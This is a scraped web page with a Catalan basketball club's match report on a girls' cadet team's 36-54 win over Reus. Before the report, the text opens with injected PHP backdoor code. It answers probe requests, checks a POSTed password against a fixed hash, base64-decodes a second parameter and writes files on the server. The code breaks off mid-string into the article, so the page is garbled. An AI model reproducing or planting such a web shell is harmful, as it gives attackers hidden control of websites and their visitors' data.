function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Victòria amb ofici del Cadet Fem 09B (36-54) - Tgn Bàsquet Club -

Victòria amb ofici del Cadet Fem 09B (36-54)

Updated: març 20, 2024

Partit corresponent a la dinovena jornada del nivell A de la categoria Cadet Femení Promoció Territorial.

Per diferents circumstàncies (cap de setmana de descans, ajornament, etc.) en el darrer mes l’equip només ha jugat un partit i interessava veure si el nivell en els entrenaments havia pogut substituir o arribar a la intensitat necessària per mantenir el ritme de competició.

De seguida es va veure que sí. L’equip va sortir força bé, sobretot en defensa, aspecte que va augmentar en el segon quart permetent arribar al descans amb un clar 12-28.

Tanmateix, per aquesta falta de ritme, per desencerts en cistelles fàcils, per excés de confiança o, simplement, perquè l’altre equip també juga, el Reus es va anar acostant en el marcador, però era més una qüestió d’ambient en el pavelló que no pas una sensació real de possibilitats de perdre el partit.

Finalment, les liles van tirar d’ofici i van situar el 36-54 final, una victòria important davant d’un equip intens i experimentat.

A falta de quatre partits per acabar la primera fase, el Cadet Fem 09B, format íntegrament per jugadores de primer any, ja s’ha classificat per al grup de quatre que lluitaran pel títol. Cal destacar la regularitat de l’equip, la implicació de totes les jugadores, la notable millora en la confiança i, en definitiva, la feinada dels dos entrenadors, en una categoria on les victòries s’estan encarint molt.